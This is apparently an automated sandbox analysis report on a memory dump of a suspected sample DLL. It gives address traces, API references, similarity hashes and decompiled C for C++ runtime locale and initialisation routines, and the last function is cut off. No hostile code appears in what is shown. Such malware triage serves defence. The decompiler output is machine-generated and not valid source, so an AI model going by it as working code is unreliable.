0x6edcd83e
0x6edcd846
0x6edcd849
0x00000000
0x00000000
0x6edcd863
0x6edcd868
0x6edcd87a
0x6edcd87d
0x6edcd880
0x00000000
0x00000000
0x6edcd88e
0x6edcd8a6
0x6edcd874
0x6edcd874
0x6edcd877
0x6edcd877
0x6edcd838
0x6edcd838
0x6edcd83b
0x6edcd83b
0x6edcd8b7
0x6edcd8bd
0x6edcd8c4
0x6edcd8ca
0x6edcd8d4
0x6edcd8e2
0x6edcd8e2
0x6edcd8e7
0x6edcd8ef
0x6edcd8fe
0x6edcd900
0x00000000
0x00000000
0x6edcd90a
0x6edcd910
0x6edcd917
0x6edcd91c
0x6edcd926
0x6edcd934
0x6edcd934
0x6edcd939
0x6edcd93b
0x6edcd942
0x00000000
0x6edcd81b
0x6edcd81b
0x6edcd822
0x6edcd822
0x00000000
0x6edcd819
0x6edcd956
0x6edcd961
0x6edcd964
0x6edcd96e
0x6edcd973
0x6edcd97a
0x6edcd97f
0x6edcd986
0x6edcd98b
0x6edcd992
0x6edcd998
0x6edcd99d
0x6edcda01
0x6edcda0e

APIs

task.LIBCPMTD ref: 6EDCD822
Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 6EDCD863
Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 6EDCD8A6
std::locale::facet::facet.LIBCPMTD ref: 6EDCD8D4
std::locale::facet::facet.LIBCPMTD ref: 6EDCD926
task.LIBCPMTD ref: 6EDCD942
task.LIBCPMTD ref: 6EDCD96E
task.LIBCPMTD ref: 6EDCD998

Part of subcall function 6EDB1ED0: task.LIBCPMTD ref: 6EDB1EF7

Strings

4sn, xrefs: 6EDCD771, 6EDCD992

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task$Concurrency::task_continuation_context::task_continuation_contextstd::locale::facet::facet
String ID: 4sn
API String ID: 3350167073-723782382
Opcode ID: 71d33cd015628bddbff4682eb20a90c773821d5a4d46e8785999f8473d69910c
Instruction ID: 32bf3305a7afc371b61c0d9aa21befe1f365436cf2ac1540a38e6492b6500312
Opcode Fuzzy Hash: 71d33cd015628bddbff4682eb20a90c773821d5a4d46e8785999f8473d69910c
Instruction Fuzzy Hash: BE71A171C14188DEDF04DFE4DCA0BEEBBB9AF55344F208559E0566B291EB345A08CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6EDD0560, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E6EDD0560(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* __ebp;

				_push(__ecx);
				_v8 = __ecx;
				E6EE3449E(_v8, 0);
				E6EDD04C0(_v8 + 4);
				E6EDD04C0(_v8 + 0xc);
				E6EDD04E0(_v8 + 0x14);
				E6EDD04E0(_v8 + 0x1c);
				E6EDD04C0(_v8 + 0x24);
				E6EDD04C0(_v8 + 0x2c);
				if(_a4 == 0) {
					E6EE34451("bad locale name");
				} else {
					E6EE347AB(_v8, _v8, _a4); // executed
				}
				return _v8;
			}

0x6edd0563
0x6edd0564
0x6edd056c
0x6edd0577
0x6edd0582
0x6edd058d
0x6edd0598
0x6edd05a3
0x6edd05ae
0x6edd05b7
0x6edd05d0
0x6edd05b9
0x6edd05c1
0x6edd05c6
0x6edd05db

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6EDD056C
_Yarn.LIBCPMTD ref: 6EDD0577
_Yarn.LIBCPMTD ref: 6EDD0582
_Yarn.LIBCPMTD ref: 6EDD058D
_Yarn.LIBCPMTD ref: 6EDD0598
_Yarn.LIBCPMTD ref: 6EDD05A3
_Yarn.LIBCPMTD ref: 6EDD05AE
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6EDD05C1

Part of subcall function 6EE347AB: _Yarn.LIBCPMT ref: 6EE347CA
Part of subcall function 6EE347AB: _Yarn.LIBCPMT ref: 6EE347EE

Strings

bad locale name, xrefs: 6EDD05CB

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3904239083-1405518554
Opcode ID: 2e7da848fade2533d521e80e8220faf1e89d49667a0d0cf13c8875757938f115
Instruction ID: d424bab7e9b301edd052b2f571ab19b3b6a1f55f09f41602b79ea7589f2e42a2
Opcode Fuzzy Hash: 2e7da848fade2533d521e80e8220faf1e89d49667a0d0cf13c8875757938f115
Instruction Fuzzy Hash: 8E019630901108EBDB19DBD8C9A0EED737A9F8428CF240859D5066A385EA31AF54D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 6EE369B5, Relevance: 10.6, APIs: 7, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6EE369B5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x6ee686c8);
				E6EE374F0(__ebx, __edi, __esi);
				_t34 =  *0x6ee78ee4; // 0x1
				if(_t34 > 0) {
					 *0x6ee78ee4 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6EE36CB6();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6ee78ee8 - 2;
					if( *0x6ee78ee8 != 2) {
						E6EE37375(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x6ee686f0);
						E6EE374F0(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6EE36B70( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6EE3685B(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(__eflags != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(__eflags == 0) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_t42 = E6EDB10E0(__eflags,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t42;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(__eflags == 0) {
											_t45 = E6EDB10E0(__eflags,  *((intOrPtr*)(_t82 + 8)), _t42, _t58);
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6EE369B5(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E6EE36B70( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6EE3685B(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6EE36B70( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6ee78ee4 - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6EE36D81(__ebx, _t61, 1, __esi);
						E6EE37340();
						E6EE374C4();
						 *0x6ee78ee8 =  *0x6ee78ee8 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6EE36A4A();
						_t54 = E6EE36F22(_t61,  *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6EE36A57();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

0x6ee369b5
0x6ee369b5
0x6ee369b7
0x6ee369bc
0x6ee369c1
0x6ee369c8
0x6ee369cf
0x6ee369d7
0x6ee369da
0x6ee369e3
0x6ee369e6
0x6ee369e9
0x6ee369f0
0x6ee36a5f
0x6ee36a64
0x6ee36a65
0x6ee36a67
0x6ee36a6c
0x6ee36a71
0x6ee36a74
0x6ee36a76
0x6ee36a87
0x6ee36a87
0x6ee36a8b
0x6ee36a8e
0x6ee36a9a
0x6ee36a9a
0x6ee36aa7
0x6ee36aa9
0x6ee36aac
0x6ee36aae
0x6ee36ab9
0x6ee36abe
0x6ee36ac0
0x6ee36ac3
0x6ee36ac5
0x00000000
0x00000000
0x6ee36ac5
0x6ee36a90
0x6ee36a90
0x6ee36a93
0x00000000
0x6ee36a95
0x6ee36a95
0x6ee36acb
0x6ee36ad0
0x6ee36ad5
0x6ee36ad7
0x6ee36ada
0x6ee36add
0x6ee36adf
0x6ee36ae1
0x6ee36ae8
0x6ee36aed
0x6ee36aef
0x6ee36aef
0x6ee36af5
0x6ee36af6
0x6ee36afb
0x6ee36b01
0x6ee36b01
0x6ee36ae1
0x6ee36b06
0x6ee36b08
0x6ee36b0f
0x6ee36b19
0x6ee36b1b
0x6ee36b1e
0x6ee36b20
0x6ee36b2c
0x6ee36b54
0x6ee36b54
0x6ee36b0a
0x6ee36b0a
0x6ee36b0d
0x00000000
0x00000000
0x6ee36b0d
0x6ee36b08
0x6ee36a93
0x6ee36b57
0x6ee36b5e
0x6ee36a78
0x6ee36a78
0x6ee36a7e
0x00000000
0x6ee36a80
0x6ee36a80
0x6ee36a80
0x6ee36a7e
0x6ee36b63
0x6ee36b6f
0x6ee369f2
0x6ee369f2
0x6ee369f7
0x6ee369fc
0x6ee36a01
0x6ee36a08
0x6ee36a0c
0x6ee36a16
0x6ee36a22
0x6ee36a24
0x6ee36a24
0x6ee36a26
0x6ee36a29
0x6ee36a30
0x6ee36a35
0x00000000
0x6ee36a35
0x6ee369ca
0x6ee369ca
0x6ee36a37
0x6ee36a3a
0x6ee36a46
0x6ee36a46

APIs

__RTC_Initialize.LIBCMT ref: 6EE369FC
___scrt_uninitialize_crt.LIBCMT ref: 6EE36A16

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: d1cb551b69073ff865408ad74fbe3409260d76d13df18d134731d97dc8cc0c4c
Instruction ID: 7e821663022c9a5d710ef3089ef7e56ee0822a079fede3009a5ad0d4cedb3087
Opcode Fuzzy Hash: d1cb551b69073ff865408ad74fbe3409260d76d13df18d134731d97dc8cc0c4c
Instruction Fuzzy Hash: 1E417072E2467BAEDB50CFF58840BAE7A79EB4179DF304529E91467250D7708901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EE47040, Relevance: 7.7, APIs: 5, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6EE47040(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				intOrPtr _v736;
				signed int* _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1268;
				intOrPtr _v1284;
				signed int _v1288;
				intOrPtr _v1324;
				signed int _v1336;
				void* __ebp;
				signed int _t249;
				signed int _t251;
				void* _t254;
				signed int _t257;
				signed int _t259;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t274;
				void* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				signed int _t284;
				signed int _t291;
				signed int _t294;
				signed int _t295;
				intOrPtr _t296;
				signed int _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				signed int _t310;
				signed int _t311;
				signed int _t313;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				signed int _t339;
				void* _t341;
				signed int _t343;
				void* _t344;
				intOrPtr _t345;
				signed int _t350;
				signed int _t351;
				intOrPtr* _t356;
				signed int _t370;
				signed int _t372;
				signed int _t374;
				intOrPtr* _t375;
				signed int _t377;
				void* _t382;
				intOrPtr* _t387;
				intOrPtr* _t390;
				void* _t393;
				signed int _t394;
				intOrPtr* _t397;
				intOrPtr* _t398;
				char* _t405;
				intOrPtr _t409;
				intOrPtr* _t410;
				signed int _t412;
				signed int _t417;
				signed int _t418;
				intOrPtr* _t422;
				intOrPtr* _t423;
				signed int _t432;
				short _t433;
				void* _t434;
				void* _t436;
				signed int _t437;
				signed int _t439;
				intOrPtr _t440;
				signed int _t443;
				intOrPtr _t444;
				signed int _t446;
				signed int _t449;
				intOrPtr _t455;
				signed int _t456;
				signed int _t458;
				signed int _t459;
				signed int _t463;
				signed int _t465;
				signed int _t468;
				signed int* _t469;
				short _t470;
				signed int _t472;
				signed int _t473;
				void* _t475;
				void* _t476;
				signed int _t477;
				void* _t478;
				void* _t479;
				signed int _t480;
				void* _t482;
				void* _t483;
				signed int _t495;

				_t499 = __fp0;
				_t431 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t249 = E6EE44756(0x6a6); // executed
				_t370 = _t249;
				_t250 = 0;
				_pop(_t382);
				if(_t370 == 0) {
					L20:
					return _t250;
				} else {
					_push(__edi);
					 *_t370 = 1;
					_t2 = _t370 + 4; // 0x4
					_t439 = _t2;
					_t455 = _a4;
					 *_t439 = 0;
					_t251 = _t455 + 0x30;
					_push( *_t251);
					_v16 = _t251;
					_push(0x6ee5f920);
					_push( *0x6ee5f85c);
					E6EE46F7C(_t370, _t382, __edx, _t439, _t455, __fp0, _t439, 0x351, 3);
					_t476 = _t475 + 0x18;
					_v8 = 0x6ee5f85c;
					while(1) {
						L2:
						_t254 = E6EE4855C(_t439, 0x351, 0x6ee5f91c);
						_t477 = _t476 + 0xc;
						if(_t254 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t422 = _t8;
							_t350 =  *_v16;
							_v16 = _t422;
							_t423 =  *_t422;
							_v20 = _t423;
							goto L4;
						}
						while(1) {
							L4:
							_t431 =  *_t350;
							if(_t431 !=  *_t423) {
								break;
							}
							if(_t431 == 0) {
								L8:
								_t351 = 0;
							} else {
								_t431 =  *((intOrPtr*)(_t350 + 2));
								if(_t431 !=  *((intOrPtr*)(_t423 + 2))) {
									break;
								} else {
									_t350 = _t350 + 4;
									_t423 = _t423 + 4;
									if(_t431 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0x6ee5f920);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t351);
							_t356 = _v8 + 0xc;
							_v8 = _t356;
							_push( *_t356);
							E6EE46F7C(_t370, _t423, _t431, _t439, _t455, _t499, _t439, 0x351, 3);
							_t476 = _t477 + 0x18;
							if(_v8 < 0x6ee5f88c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E6EE4471C(_t370);
									_t446 = _t439 | 0xffffffff;
									__eflags =  *(_t455 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E6EE4471C( *(_t455 + 0x28));
										}
									}
									__eflags =  *(_t455 + 0x24);
									if( *(_t455 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t446 == 1;
										if(_t446 == 1) {
											E6EE4471C( *(_t455 + 0x24));
										}
									}
									 *(_t455 + 0x24) = 0;
									 *(_t455 + 0x1c) = 0;
									 *(_t455 + 0x28) = 0;
									 *((intOrPtr*)(_t455 + 0x20)) = 0;
									_t250 =  *((intOrPtr*)(_t455 + 0x40));
								} else {
									_t449 = _t439 | 0xffffffff;
									_t495 =  *(_t455 + 0x28);
									if(_t495 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t495 == 0) {
											E6EE4471C( *(_t455 + 0x28));
										}
									}
									if( *(_t455 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t449 == 1) {
											E6EE4471C( *(_t455 + 0x24));
										}
									}
									 *(_t455 + 0x24) =  *(_t455 + 0x24) & 0x00000000;
									_t28 = _t370 + 4; // 0x4
									_t250 = _t28;
									 *(_t455 + 0x1c) =  *(_t455 + 0x1c) & 0x00000000;
									 *(_t455 + 0x28) = _t370;
									 *((intOrPtr*)(_t455 + 0x20)) = _t250;
								}
								goto L20;
							}
							goto L136;
						}
						asm("sbb eax, eax");
						_t351 = _t350 | 0x00000001;
						__eflags = _t351;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6EE3AC93();
					asm("int3");
					_t472 = _t477;
					_t478 = _t477 - 0x1d0;
					_t257 =  *0x6ee77a68; // 0xbfafeb97
					_v60 = _t257 ^ _t472;
					_t259 = _v44;
					_push(_t370);
					_push(_t455);
					_t456 = _v40;
					_push(_t439);
					_t440 = _v48;
					_v512 = _t440;
					__eflags = _t259;
					if(_t259 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t372 = 0;
						_v452 = 0;
						__eflags = _t456;
						if(__eflags == 0) {
							L80:
							E6EE47040(_t372, _t431, _t440, _t456, __eflags, _t499, _t440); // executed
							goto L81;
						} else {
							__eflags =  *_t456 - 0x4c;
							if( *_t456 != 0x4c) {
								L60:
								_t266 = E6EE46BB6(_t372, _t431, _t440, _t456, _t499, _t456,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
								_t479 = _t478 + 0x18;
								__eflags = _t266;
								if(_t266 != 0) {
									__eflags = 0;
									_t432 = _t440 + 0x20;
									_t458 = 0;
									_v452 = _t432;
									do {
										__eflags = _t458;
										if(_t458 == 0) {
											L75:
											_t267 = _v460;
										} else {
											_t387 =  *_t432;
											_t268 =  &_v276;
											while(1) {
												__eflags =  *_t268 -  *_t387;
												_t440 = _v464;
												if( *_t268 !=  *_t387) {
													break;
												}
												__eflags =  *_t268;
												if( *_t268 == 0) {
													L68:
													_t269 = 0;
												} else {
													_t433 =  *((intOrPtr*)(_t268 + 2));
													__eflags = _t433 -  *((intOrPtr*)(_t387 + 2));
													_v454 = _t433;
													_t432 = _v452;
													if(_t433 !=  *((intOrPtr*)(_t387 + 2))) {
														break;
													} else {
														_t268 = _t268 + 4;
														_t387 = _t387 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L68;
														}
													}
												}
												L70:
												__eflags = _t269;
												if(_t269 == 0) {
													_t372 = _t372 + 1;
													__eflags = _t372;
													goto L75;
												} else {
													_t270 =  &_v276;
													_push(_t270);
													_push(_t458);
													_push(_t440);
													L84();
													_t432 = _v452;
													_t479 = _t479 + 0xc;
													__eflags = _t270;
													if(_t270 == 0) {
														_t267 = 0;
														_v460 = 0;
													} else {
														_t372 = _t372 + 1;
														goto L75;
													}
												}
												goto L76;
											}
											asm("sbb eax, eax");
											_t269 = _t268 | 0x00000001;
											__eflags = 0;
											goto L70;
										}
										L76:
										_t458 = _t458 + 1;
										_t432 = _t432 + 0x10;
										_v452 = _t432;
										__eflags = _t458 - 5;
									} while (_t458 <= 5);
									__eflags = _t267;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t372;
										if(__eflags != 0) {
											goto L80;
										} else {
										}
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t456 + 2) - 0x43;
								if( *(_t456 + 2) != 0x43) {
									goto L60;
								} else {
									__eflags =  *((short*)(_t456 + 4)) - 0x5f;
									if( *((short*)(_t456 + 4)) != 0x5f) {
										goto L60;
									} else {
										while(1) {
											_t272 = E6EE51763(_t456, 0x6ee5f914);
											_t374 = _t272;
											_v468 = _t374;
											_pop(_t389);
											__eflags = _t374;
											if(_t374 == 0) {
												break;
											}
											_t274 = _t272 - _t456;
											__eflags = _t274;
											_v460 = _t274 >> 1;
											if(_t274 == 0) {
												break;
											} else {
												_t276 = 0x3b;
												__eflags =  *_t374 - _t276;
												if( *_t374 == _t276) {
													break;
												} else {
													_t443 = _v460;
													_t375 = 0x6ee5f85c;
													_v456 = 1;
													do {
														_t277 = E6EE44055( *_t375, _t456, _t443);
														_t478 = _t478 + 0xc;
														__eflags = _t277;
														if(_t277 != 0) {
															goto L46;
														} else {
															_t390 =  *_t375;
															_t434 = _t390 + 2;
															do {
																_t345 =  *_t390;
																_t390 = _t390 + 2;
																__eflags = _t345 - _v472;
															} while (_t345 != _v472);
															_t389 = _t390 - _t434 >> 1;
															__eflags = _t443 - _t390 - _t434 >> 1;
															if(_t443 != _t390 - _t434 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v456 = _v456 + 1;
														_t375 = _t375 + 0xc;
														__eflags = _t375 - 0x6ee5f88c;
													} while (_t375 <= 0x6ee5f88c);
													_t372 = _v468 + 2;
													_t278 = E6EE5170A(_t389, _t372, 0x6ee5f91c);
													_t440 = _v464;
													_t459 = _t278;
													_pop(_t393);
													__eflags = _t459;
													if(_t459 != 0) {
														L49:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t394 = _v452;
															goto L55;
														} else {
															_push(_t459);
															_t281 = E6EE516FF( &_v276, 0x83, _t372);
															_t480 = _t478 + 0x10;
															__eflags = _t281;
															if(_t281 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E6EE3AC93();
																asm("int3");
																_push(_t472);
																_t473 = _t480;
																_t284 =  *0x6ee77a68; // 0xbfafeb97
																_v560 = _t284 ^ _t473;
																_push(_t372);
																_t377 = _v544;
																_push(_t459);
																_push(_t440);
																_t444 = _v548;
																_v1288 = _t377;
																_v1284 = E6EE444CA(_t393, _t431, _t499) + 0x278;
																_t291 = E6EE46BB6(_t377, _t431, _t444, _v540, _t499, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1268);
																_t482 = _t480 - 0x2e4 + 0x18;
																__eflags = _t291;
																if(_t291 == 0) {
																	L124:
																	__eflags = 0;
																	goto L125;
																} else {
																	_t103 = _t377 + 2; // 0x6
																	_t463 = _t103 << 4;
																	__eflags = _t463;
																	_t294 =  &_v280;
																	_v720 = _t463;
																	_t397 =  *((intOrPtr*)(_t463 + _t444));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t294 -  *_t397;
																		_t465 = _v720;
																		if( *_t294 !=  *_t397) {
																			break;
																		}
																		__eflags =  *_t294;
																		if( *_t294 == 0) {
																			L91:
																			_t295 = _v712;
																		} else {
																			_t470 =  *((intOrPtr*)(_t294 + 2));
																			__eflags = _t470 -  *((intOrPtr*)(_t397 + 2));
																			_v714 = _t470;
																			_t465 = _v720;
																			if(_t470 !=  *((intOrPtr*)(_t397 + 2))) {
																				break;
																			} else {
																				_t294 = _t294 + 4;
																				_t397 = _t397 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t295;
																		if(_t295 != 0) {
																			_t398 =  &_v280;
																			_t436 = _t398 + 2;
																			do {
																				_t296 =  *_t398;
																				_t398 = _t398 + 2;
																				__eflags = _t296 - _v712;
																			} while (_t296 != _v712);
																			_v716 = (_t398 - _t436 >> 1) + 1;
																			_t299 = E6EE44756(4 + ((_t398 - _t436 >> 1) + 1) * 2);
																			_v732 = _t299;
																			__eflags = _t299;
																			if(_t299 == 0) {
																				goto L124;
																			} else {
																				_v728 =  *((intOrPtr*)(_t465 + _t444));
																				_v748 =  *(_t444 + 0xa0 + _t377 * 4);
																				_v752 =  *(_t444 + 8);
																				_t405 =  &_v280;
																				_v736 = _t299 + 4;
																				_t301 = E6EE485D1(_t299 + 4, _v716, _t405);
																				_t483 = _t482 + 0xc;
																				__eflags = _t301;
																				if(_t301 != 0) {
																					_t302 = _v712;
																					_push(_t302);
																					_push(_t302);
																					_push(_t302);
																					_push(_t302);
																					_push(_t302);
																					E6EE3AC93();
																					asm("int3");
																					_push(_t473);
																					_push(_t405);
																					_v1336 = _v1336 & 0x00000000;
																					_t305 = E6EE44DE4(_v1324, 0x20001004,  &_v1336, 2);
																					__eflags = _t305;
																					if(_t305 == 0) {
																						L134:
																						return 0xfde9;
																					}
																					_t307 = _v20;
																					__eflags = _t307;
																					if(_t307 == 0) {
																						goto L134;
																					}
																					return _t307;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t465 + _t444)) = _v736;
																					if(_v280 != 0x43) {
																						L102:
																						_t310 = E6EE46935(_t377, _t444,  &_v708);
																						_t437 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t437 = _v712;
																							_t310 = _t437;
																						}
																					}
																					 *(_t444 + 0xa0 + _t377 * 4) = _t310;
																					__eflags = _t377 - 2;
																					if(_t377 != 2) {
																						__eflags = _t377 - 1;
																						if(_t377 != 1) {
																							__eflags = _t377 - 5;
																							if(_t377 == 5) {
																								 *((intOrPtr*)(_t444 + 0x14)) = _v724;
																							}
																						} else {
																							 *((intOrPtr*)(_t444 + 0x10)) = _v724;
																						}
																					} else {
																						_t469 = _v740;
																						 *(_t444 + 8) = _v724;
																						_v716 = _t469[8];
																						_t417 = _t469[9];
																						_v724 = _t417;
																						while(1) {
																							__eflags =  *(_t444 + 8) -  *(_t469 + _t437 * 8);
																							if( *(_t444 + 8) ==  *(_t469 + _t437 * 8)) {
																								break;
																							}
																							_t339 =  *(_t469 + _t437 * 8);
																							_t417 =  *(_t469 + 4 + _t437 * 8);
																							 *(_t469 + _t437 * 8) = _v716;
																							 *(_t469 + 4 + _t437 * 8) = _v724;
																							_t437 = _t437 + 1;
																							_t377 = _v744;
																							_v716 = _t339;
																							_v724 = _t417;
																							__eflags = _t437 - 5;
																							if(_t437 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t437 - 5;
																							if(__eflags == 0) {
																								_t331 = E6EE4C37D(_t377, _t437, _t444, _t469, __eflags, _t499, _v712, 1, 0x6ee5f7d0, 0x7f,  &_v536,  *(_t444 + 8), 1);
																								_t483 = _t483 + 0x1c;
																								__eflags = _t331;
																								if(_t331 == 0) {
																									_t418 = _v712;
																								} else {
																									_t333 = _v712;
																									do {
																										 *(_t473 + _t333 * 2 - 0x20c) =  *(_t473 + _t333 * 2 - 0x20c) & 0x000001ff;
																										_t333 = _t333 + 1;
																										__eflags = _t333 - 0x7f;
																									} while (_t333 < 0x7f);
																									_t335 = E6EE37FB0( &_v536,  *0x6ee77c20, 0xfe);
																									_t483 = _t483 + 0xc;
																									__eflags = _t335;
																									_t418 = 0 | _t335 == 0x00000000;
																								}
																								_t469[1] = _t418;
																								 *_t469 =  *(_t444 + 8);
																							}
																							 *(_t444 + 0x18) = _t469[1];
																							goto L122;
																						}
																						__eflags = _t437;
																						if(_t437 != 0) {
																							 *_t469 =  *(_t469 + _t437 * 8);
